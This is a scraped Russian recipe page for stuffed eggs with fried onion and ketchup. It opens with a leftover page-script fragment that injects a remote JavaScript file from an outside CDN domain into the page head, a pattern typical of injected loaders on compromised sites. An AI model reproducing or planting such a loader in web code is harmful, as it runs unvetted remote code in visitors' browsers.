, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Вкусно + Полезно

Фаршированные яйца


eggs

vkusnopolezno

Этот блюдо из моего детства. Мама всегда готовила его к праздничному столу. Все, кто его отведал, не смогли не взять рецепт. На самом деле это очень просто и очень вкусно!

 

Что и сколько берем:

1. Яйца — 5 шт.

2. Лук репчатый — 1 шт.

3. Кутчуп — 2-3  ст.ложки

4. Соль и перец по вкусу

 

Начинаем готовить:

Варим яйца подольше, чтобы желтки получились тверденькими. Чистим и аккуратненько режем пополам. Желтки складываем в миску. На сковороде обжариваем до золотистого цвета лук (режем меленько) и добавляем кетчуп. Обжариваем еще минутку и потом все это выкладываем в желтки. Мешаем очень хорошо, чтобы не было комочков. Солим и перчим. Ну и, как вы догадались, начинаем этим наши белки. Можно еще немножко потом полить майонезом.

На эту тему вы можете почитать:

Картофель по-тоскански
Цветная капуста в яйце
Баклажаны с кускусом

Тэги:



Добавить комментарий